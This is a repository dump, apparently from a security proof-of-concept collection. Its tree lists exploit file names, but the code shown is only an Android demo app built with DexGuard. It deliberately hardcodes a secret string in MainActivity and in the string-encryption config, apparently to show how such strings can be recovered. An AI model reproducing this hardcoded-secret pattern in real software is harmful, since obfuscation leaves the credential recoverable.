├── .gitignore
├── DexGuard_String_Decryption
├── .DS_Store
├── DexGuard_Protected_APK.apk
└── SRC
│ ├── .DS_Store
│ ├── DexReverseDemo.iml
│ ├── app
│ ├── .DS_Store
│ ├── .gitignore
│ ├── app-release.apk
│ ├── app.iml
│ ├── build.gradle
│ ├── dexguard-project.txt
│ ├── manifest-merger-release-report.txt
│ ├── proguard-android.txt
│ ├── proguard-project.txt
│ ├── proguard-rules.pro
│ └── src
│ │ ├── .DS_Store
│ │ ├── androidTest
│ │ ├── .DS_Store
│ │ └── java
│ │ │ ├── .DS_Store
│ │ │ └── opensecurity
│ │ │ ├── .DS_Store
│ │ │ └── dexreversedemo
│ │ │ └── ApplicationTest.java
│ │ └── main
│ │ ├── .DS_Store
│ │ ├── AndroidManifest.xml
│ │ ├── java
│ │ ├── .DS_Store
│ │ └── opensecurity
│ │ │ ├── .DS_Store
│ │ │ └── dexreversedemo
│ │ │ ├── .DS_Store
│ │ │ ├── MainActivity.java
│ │ │ └── Secret.java
│ │ └── res
│ │ ├── .DS_Store
│ │ ├── drawable-hdpi
│ │ └── ic_launcher.png
│ │ ├── drawable-mdpi
│ │ └── ic_launcher.png
│ │ ├── drawable-xhdpi
│ │ └── ic_launcher.png
│ │ ├── drawable-xxhdpi
│ │ └── ic_launcher.png
│ │ ├── layout
│ │ ├── activity_main.xml
│ │ └── activity_secret.xml
│ │ ├── menu
│ │ ├── menu_main.xml
│ │ └── menu_secret.xml
│ │ ├── values-w820dp
│ │ └── dimens.xml
│ │ └── values
│ │ ├── dimens.xml
│ │ ├── strings.xml
│ │ └── styles.xml
│ ├── build.gradle
│ ├── gradle.properties
│ ├── gradle
│ ├── .DS_Store
│ └── wrapper
│ │ ├── .DS_Store
│ │ ├── gradle-wrapper.jar
│ │ └── gradle-wrapper.properties
│ ├── gradlew
│ ├── gradlew.bat
│ ├── local.properties
│ └── settings.gradle
├── KMPlayer 3.7.0.109 Integer division by zero DoS.py
├── KMPlayer 3.9.1.130 Integer division by zero DoS.py
├── MTS MBlaze Ultra Wi-Fi_ZTE AC3633 Exploit.py
├── README.md
├── WordPress Clean And Simple Contact Form 4.4.0 XSS
├── applock md5 bruteforce.go
├── csp.gif
├── github_revoke_this_please.env
├── polyglot.html
├── reverse_shell.ps1
├── script.js
└── terminal-poc
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 |
5 | # C extensions
6 | *.so
7 |
8 | # Distribution / packaging
9 | .Python
10 | env/
11 | bin/
12 | build/
13 | develop-eggs/
14 | dist/
15 | eggs/
16 | lib/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | *.egg-info/
22 | .installed.cfg
23 | *.egg
24 |
25 | # Installer logs
26 | pip-log.txt
27 | pip-delete-this-directory.txt
28 |
29 | # Unit test / coverage reports
30 | htmlcov/
31 | .tox/
32 | .coverage
33 | .cache
34 | nosetests.xml
35 | coverage.xml
36 |
37 | # Translations
38 | *.mo
39 |
40 | # Mr Developer
41 | .mr.developer.cfg
42 | .project
43 | .pydevproject
44 |
45 | # Rope
46 | .ropeproject
47 |
48 | # Django stuff:
49 | *.log
50 | *.pot
51 |
52 | # Sphinx documentation
53 | docs/_build/
54 |
55 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/DexGuard_Protected_APK.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/DexGuard_Protected_APK.apk
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/DexReverseDemo.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/.gitignore:
--------------------------------------------------------------------------------
1 | /build
2 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/app-release.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/app-release.apk
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/app.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/build.gradle:
--------------------------------------------------------------------------------
// Gradle build script for the demo app module. It applies the Android
// application plugin and the DexGuard plugin, and points both build types at
// the DexGuard/ProGuard configuration files that sit next to this script.
buildscript {
    repositories {
        mavenCentral()
        // NOTE(review): absolute path on one workstation. A flatDir repository
        // is a plain folder of jars, so whatever DexGuard jar is in this folder
        // becomes part of the build classpath; the build cannot be reproduced
        // (or audited) from this file alone.
        flatDir { dirs '/Users/aabraham/DexGuard6.1.07/lib' }
    }
    dependencies {
        classpath 'com.android.tools.build:gradle:1.0.0'
        // No group and no version in this coordinate; presumably resolved by
        // name from the flatDir folder above -- confirm.
        classpath ':dexguard:'
    }
}

apply plugin: 'com.android.application'
apply plugin: 'dexguard'
android {
    compileSdkVersion 21
    buildToolsVersion "21.1.2"

    defaultConfig {
        // The application id differs from the Java package used by the sources
        // (opensecurity.dexreversedemo).
        applicationId "opensecurity.sendsecret"
        minSdkVersion 17
        targetSdkVersion 21
        versionCode 1
        versionName "1.0"
    }
    buildTypes {
        debug {
            // Debug builds use DexGuard's debug defaults plus the two project files.
            proguardFile getDefaultDexGuardFile('dexguard-debug.pro')
            proguardFile 'dexguard-project.txt'
            proguardFile 'proguard-project.txt'
        }
        release {
            minifyEnabled true
            // NOTE(review): the stock Android ProGuard defaults are listed
            // together with DexGuard's release defaults; confirm both are
            // meant to apply to the same build.
            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
            proguardFile getDefaultDexGuardFile('dexguard-release.pro')
            // dexguard-project.txt carries the -encryptstrings / -encryptclasses
            // options for this demo.
            proguardFile 'dexguard-project.txt'
            proguardFile 'proguard-project.txt'
        }
    }
}

dependencies {
    compile fileTree(dir: 'libs', include: ['*.jar'])
    compile 'com.android.support:appcompat-v7:21.0.3'
    // libs/dexguard_util.jar also matches the '*.jar' fileTree pattern above,
    // so it is named twice.
    compile files('libs/dexguard_util.jar')
}
46 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/dexguard-project.txt:
--------------------------------------------------------------------------------
# DexGuard options for the demo build; app/build.gradle passes this file to
# both build types through proguardFile.
#
# The value handed to -encryptstrings is the same literal that MainActivity.java
# declares as its `secret` constant, and it sits here in clear text in the
# repository. String encryption changes how the literal is stored in the APK;
# the app still has to recover the plain value on the device in order to use
# it, so this is obfuscation, not a place to keep a value that must stay
# confidential.
-encryptstrings "SuperZS3cur!ty0R0CK3S"
# Class encryption is requested for the two activities of the demo.
-encryptclasses opensecurity.dexreversedemo.MainActivity,opensecurity.dexreversedemo.Secret
3 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/manifest-merger-release-report.txt:
--------------------------------------------------------------------------------
1 | -- Merging decision tree log ---
2 | manifest
3 | ADDED from AndroidManifest.xml:2:1
4 | xmlns:android
5 | ADDED from AndroidManifest.xml:2:11
6 | package
7 | ADDED from AndroidManifest.xml:3:5
8 | INJECTED from AndroidManifest.xml:0:0
9 | INJECTED from AndroidManifest.xml:0:0
10 | android:versionName
11 | INJECTED from AndroidManifest.xml:0:0
12 | INJECTED from AndroidManifest.xml:0:0
13 | android:versionCode
14 | INJECTED from AndroidManifest.xml:0:0
15 | INJECTED from AndroidManifest.xml:0:0
16 | application
17 | ADDED from AndroidManifest.xml:5:5
18 | MERGED from com.android.support:appcompat-v7:21.0.3:16:5
19 | MERGED from com.android.support:support-v4:21.0.3:16:5
20 | android:label
21 | ADDED from AndroidManifest.xml:8:9
22 | android:allowBackup
23 | ADDED from AndroidManifest.xml:6:9
24 | android:icon
25 | ADDED from AndroidManifest.xml:7:9
26 | android:theme
27 | ADDED from AndroidManifest.xml:9:9
28 | activity#opensecurity.dexreversedemo.MainActivity
29 | ADDED from AndroidManifest.xml:10:9
30 | android:label
31 | ADDED from AndroidManifest.xml:12:13
32 | android:name
33 | ADDED from AndroidManifest.xml:11:13
34 | intent-filter#android.intent.action.MAIN+android.intent.category.LAUNCHER
35 | ADDED from AndroidManifest.xml:13:13
36 | action#android.intent.action.MAIN
37 | ADDED from AndroidManifest.xml:14:17
38 | android:name
39 | ADDED from AndroidManifest.xml:14:25
40 | category#android.intent.category.LAUNCHER
41 | ADDED from AndroidManifest.xml:16:17
42 | android:name
43 | ADDED from AndroidManifest.xml:16:27
44 | activity#opensecurity.dexreversedemo.Secret
45 | ADDED from AndroidManifest.xml:19:9
46 | android:label
47 | ADDED from AndroidManifest.xml:21:13
48 | android:name
49 | ADDED from AndroidManifest.xml:20:13
50 | uses-sdk
51 | INJECTED from AndroidManifest.xml:0:0 reason: use-sdk injection requested
52 | MERGED from com.android.support:appcompat-v7:21.0.3:15:5
53 | MERGED from com.android.support:support-v4:21.0.3:15:5
54 | android:targetSdkVersion
55 | INJECTED from AndroidManifest.xml:0:0
56 | INJECTED from AndroidManifest.xml:0:0
57 | android:minSdkVersion
58 | INJECTED from AndroidManifest.xml:0:0
59 | INJECTED from AndroidManifest.xml:0:0
60 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-android.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/proguard-android.txt
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-project.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/proguard-project.txt
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/proguard-rules.pro:
--------------------------------------------------------------------------------
1 | # Add project specific ProGuard rules here.
2 | # By default, the flags in this file are appended to flags specified
3 | # in /Users/aabraham/Library/Android/sdk/tools/proguard/proguard-android.txt
4 | # You can edit the include path and order by changing the proguardFiles
5 | # directive in build.gradle.
6 | #
7 | # For more details, see
8 | # http://developer.android.com/guide/developing/tools/proguard.html
9 |
10 | # Add any project specific keep options here:
11 |
12 | # If your project uses WebView with JS, uncomment the following
13 | # and specify the fully qualified class name to the JavaScript interface
14 | # class:
15 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview {
16 | # public *;
17 | #}
18 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/java/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/androidTest/java/opensecurity/dexreversedemo/ApplicationTest.java:
--------------------------------------------------------------------------------
1 | package opensecurity.dexreversedemo;
2 |
3 | import android.app.Application;
4 | import android.test.ApplicationTestCase;
5 |
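/**
 * Instrumentation test scaffold for the app module. It binds
 * {@link ApplicationTestCase} to the base {@link Application} class and
 * defines no test methods of its own. See the Android "Testing Fundamentals"
 * guide.
 */
public class ApplicationTest extends ApplicationTestCase<Application> {
    /** Passes the application class under test to the framework test case. */
    public ApplicationTest() {
        // The type argument above matches the class literal given here, so the
        // superclass is no longer used as a raw type.
        super(Application.class);
    }
}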
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/AndroidManifest.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/MainActivity.java:
--------------------------------------------------------------------------------
1 | package opensecurity.dexreversedemo;
2 |
3 | import android.content.Intent;
4 | import android.os.Bundle;
5 | import android.support.v7.app.ActionBarActivity;
6 | import android.view.Menu;
7 | import android.view.MenuItem;
8 | import android.view.View;
9 | import android.widget.Button;
10 |
11 |
/**
 * Launcher activity of the demo. Tapping the button starts {@link Secret}
 * with an explicit intent that carries the {@code secret} constant as the
 * "SECURE" extra.
 */
public class MainActivity extends ActionBarActivity {
    public Button bt;

    // Compile-time constant baked into the class. app/dexguard-project.txt
    // names the same literal under -encryptstrings; that hides it from a plain
    // string search of the APK, but the app must still recover the clear value
    // at run time, so a real credential should never live in a constant like
    // this.
    private static final String secret = "SuperZS3cur!ty0R0CK3S";

    /** Sets the layout and wires the button to launch the Secret activity. */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        View.OnClickListener openSecret = new View.OnClickListener() {
            @Override
            public void onClick(View clicked) {
                // Explicit intent: the target is named by class, inside this app.
                Intent toSecret = new Intent(MainActivity.this, Secret.class);
                toSecret.putExtra("SECURE", secret);
                startActivity(toSecret);
            }
        };

        bt = (Button) findViewById(R.id.button);
        bt.setOnClickListener(openSecret);
    }

    /** Inflates menu_main into the options menu and reports it as shown. */
    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.menu_main, menu);
        return true;
    }

    /**
     * Consumes the "settings" item; every other item is passed to the
     * superclass.
     */
    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        return item.getItemId() == R.id.action_settings
                || super.onOptionsItemSelected(item);
    }
}
53 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/java/opensecurity/dexreversedemo/Secret.java:
--------------------------------------------------------------------------------
1 | package opensecurity.dexreversedemo;
2 |
3 | import android.os.Bundle;
4 | import android.support.v7.app.ActionBarActivity;
5 | import android.view.Menu;
6 | import android.view.MenuItem;
7 | import android.widget.TextView;
8 |
9 |
/**
 * Second activity of the demo, started by MainActivity. As written it only
 * shows its layout: the "SECURE" extra attached by MainActivity is not read
 * anywhere in this class, and the field {@code t} is never assigned here.
 */
public class Secret extends ActionBarActivity {
    public TextView t;

    /** Restores framework state and sets the activity_secret layout. */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_secret);
    }

    /** Inflates menu_secret into the options menu and reports it as shown. */
    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.menu_secret, menu);
        return true;
    }

    /**
     * Consumes the "settings" item; every other item is passed to the
     * superclass.
     */
    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        return item.getItemId() == R.id.action_settings
                || super.onOptionsItemSelected(item);
    }
}
43 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-hdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-hdpi/ic_launcher.png
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-mdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-mdpi/ic_launcher.png
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/app/src/main/res/drawable-xxhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/layout/activity_main.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/layout/activity_secret.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/menu/menu_main.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/menu/menu_secret.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values-w820dp/dimens.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 64dp
6 |
7 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/dimens.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | 16dp
4 | 16dp
5 |
6 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/strings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | DexReverseDemo
5 | Hello world!
6 | Settings
7 | Secret
8 |
9 |
10 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/app/src/main/res/values/styles.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/build.gradle:
--------------------------------------------------------------------------------
// Top-level build file where you can add configuration options common to all sub-projects/modules.
// It declares where the Android Gradle plugin is fetched from and gives every
// project in the build the same artifact repository.

buildscript {
    repositories {
        // NOTE(review): JCenter has been sunset by its operator; confirm which
        // repository these artifacts should be resolved from before building.
        jcenter()
    }
    dependencies {
        classpath 'com.android.tools.build:gradle:1.0.0'

        // NOTE: Do not place your application dependencies here; they belong
        // in the individual module build.gradle files
    }
}

allprojects {
    repositories {
        // Same repository as the buildscript block; the same caveat applies.
        jcenter()
    }
}
20 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle.properties:
--------------------------------------------------------------------------------
1 | # Project-wide Gradle settings.
2 |
3 | # IDE (e.g. Android Studio) users:
4 | # Gradle settings configured through the IDE *will override*
5 | # any settings specified in this file.
6 |
7 | # For more details on how to configure your build environment visit
8 | # http://www.gradle.org/docs/current/userguide/build_environment.html
9 |
10 | # Specifies the JVM arguments used for the daemon process.
11 | # The setting is particularly useful for tweaking memory settings.
12 | # Default value: -Xmx10248m -XX:MaxPermSize=256m
13 | # org.gradle.jvmargs=-Xmx2048m -XX:MaxPermSize=512m -XX:+HeapDumpOnOutOfMemoryError -Dfile.encoding=UTF-8
14 |
15 | # When configured, Gradle will run in incubating parallel mode.
16 | # This option should only be used with decoupled projects. More details, visit
17 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
18 | # org.gradle.parallel=true
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/wrapper/.DS_Store
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ajinabraham/PoC/5102a9d0b6ab424bf6f7aad8767bdf4610ab6a34/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
#Wed Apr 10 15:27:10 PDT 2013
# Settings read by the Gradle wrapper: where the distribution is downloaded
# from and where it is unpacked.
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
# The distribution is fetched over https. This file sets no
# distributionSha256Sum, so the downloaded zip is not checked against a pinned
# digest here. The repository also commits gradle/wrapper/gradle-wrapper.jar as
# a binary that gradlew puts on the classpath; compare it with the checksum
# published for this Gradle version before trusting the build.
distributionUrl=https\://services.gradle.org/distributions/gradle-2.2.1-all.zip
7 |
--------------------------------------------------------------------------------
/DexGuard_String_Decryption/SRC/gradlew:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | ##############################################################################
4 | ##
5 | ## Gradle start up script for UN*X
6 | ##
7 | ##############################################################################
8 |
9 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
10 | DEFAULT_JVM_OPTS=""
11 |
12 | APP_NAME="Gradle"
13 | APP_BASE_NAME=`basename "$0"`
14 |
15 | # Use the maximum available, or set MAX_FD != -1 to use that value.
16 | MAX_FD="maximum"
17 |
# Print a non-fatal diagnostic: all arguments joined into one line on stdout.
warn() {
    echo "$*"
}
21 |
# Print the message on stdout, framed by one empty line before and after,
# then terminate the script with exit status 1.
die() {
    echo
    echo "$*"
    echo
    exit 1
}
28 |
# OS specific support (must be 'true' or 'false').
# The flags are later executed as commands (`if $cygwin`), which is why they
# have to hold exactly `true` or `false`.
cygwin=false
msys=false
darwin=false
case "`uname`" in
  CYGWIN* )
    cygwin=true
    ;;
  Darwin* )
    darwin=true
    ;;
  MINGW* )
    msys=true
    ;;
esac

# For Cygwin, ensure paths are in UNIX format before anything is touched.
if $cygwin ; then
    [ -n "$JAVA_HOME" ] && JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
fi

# Attempt to set APP_HOME
# Resolve links: $0 may be a link
PRG="$0"
# Need this for relative symlinks.
# Each pass reads the link target out of `ls -ld` output and follows it until
# PRG is no longer a symlink.
while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
        PRG="$link"
    else
        PRG=`dirname "$PRG"`"/$link"
    fi
done
# Enter the script's directory (stdout closed for the cd) to read its physical
# path, then return to the caller's directory.
SAVED="`pwd`"
cd "`dirname \"$PRG\"`/" >&-
APP_HOME="`pwd -P`"
cd "$SAVED" >&-

# The wrapper jar next to this script is what the JVM is started with; it is a
# binary committed to the repository and runs with the invoking user's rights.
CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar

# Determine the Java command to use to start the JVM.
# JAVA_HOME, when set, decides which binary is executed; otherwise the first
# `java` found on PATH is used.
if [ -n "$JAVA_HOME" ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
        # IBM's JDK on AIX uses strange locations for the executables
        JAVACMD="$JAVA_HOME/jre/sh/java"
    else
        JAVACMD="$JAVA_HOME/bin/java"
    fi
    if [ ! -x "$JAVACMD" ] ; then
        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
    fi
else
    JAVACMD="java"
    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
fi

# Increase the maximum file descriptors if we can.
# Skipped on Cygwin and Darwin. A failure to query or raise the limit only
# produces a warning; the launch continues.
if [ "$cygwin" = "false" -a "$darwin" = "false" ] ; then
    MAX_FD_LIMIT=`ulimit -H -n`
    if [ $? -eq 0 ] ; then
        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
            MAX_FD="$MAX_FD_LIMIT"
        fi
        ulimit -n $MAX_FD
        if [ $? -ne 0 ] ; then
            warn "Could not set maximum file descriptor limit: $MAX_FD"
        fi
    else
        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
    fi
fi

# For Darwin, add options to specify how the application appears in the dock
if $darwin; then
    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
fi

# For Cygwin, switch paths to Windows format before running java
if $cygwin ; then
    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`

    # We build the pattern for arguments to be converted via cygpath
    # (an alternation of the directories found directly under /).
    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
    SEP=""
    for dir in $ROOTDIRSRAW ; do
        ROOTDIRS="$ROOTDIRS$SEP$dir"
        SEP="|"
    done
    OURCYGPATTERN="(^($ROOTDIRS))"
    # Add a user-defined pattern to the cygpath arguments
    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
    fi
    # Now convert the arguments - kludge to limit ourselves to /bin/sh
    # NOTE(review): each argument is stored through `eval`, with its text
    # placed inside double quotes of the evaluated assignment, so quotes, `$`
    # and backticks inside an argument are interpreted by the shell again on
    # this Cygwin path. Command-line arguments must come from a trusted caller.
    i=0
    for arg in "$@" ; do
        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
        CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option

        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition
            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
        else
            eval `echo args$i`="\"$arg\""
        fi
        i=$((i+1))
    done
    # Rebuild the positional parameters from the converted copies. There is no
    # branch for more than nine arguments, so in that case the original,
    # unconverted parameters are left in place.
    case $i in
        (0) set -- ;;
        (1) set -- "$args0" ;;
        (2) set -- "$args0" "$args1" ;;
        (3) set -- "$args0" "$args1" "$args2" ;;
        (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
        (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
        (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
        (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
        (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
        (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
    esac
fi
156 |
